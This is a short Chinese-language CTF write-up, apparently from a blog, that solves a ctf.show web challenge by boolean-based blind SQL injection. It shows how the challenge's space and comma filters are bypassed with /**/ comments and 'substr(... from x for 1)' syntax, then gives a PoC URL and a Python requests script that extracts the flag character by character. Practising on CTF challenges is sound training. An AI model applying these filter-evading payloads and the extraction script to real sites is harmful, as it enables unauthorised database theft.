0x00 前言

• CTF 加解密合集
• CTF Web合集

0x01 题目

0x02 Write Up

这道题实际上就是一个单纯的布尔型盲注，只不过是过滤了一些东西，一个是过滤的空格，还有一个是过滤了逗号

那么我们需要做的就是对这两个进行绕过，空格还是用/**/进行绕过，逗号的话substr需要用到，但是substr可以用from 1 for 1进行绕过

那么我们的poc就是

http://ace7b8b3-0ff2-4843-ba47-67e97ff53f25.challenge.ctf.show/index.php?id=-1/**/||/**/ascii(substr((select/**/flag/**/from/**/flag)/**/from/**/1/**/for/**/1))>1#

然后写一个脚本

import requests

flag=""
for x in range(1,50):
	for i in range(1,300):
		url=f"http://ace7b8b3-0ff2-4843-ba47-67e97ff53f25.challenge.ctf.show/index.php?id=-1/**/||/**/ascii(substr((select/**/flag/**/from/**/flag)/**/from/**/{x}/**/for/**/1))={i}#"
		s=requests.get(url).text
		if len(s)>1000:
			flag+=chr(i)
			print(chr(i))
			break

print(flag)

最终运行一下就可以获得flag

以上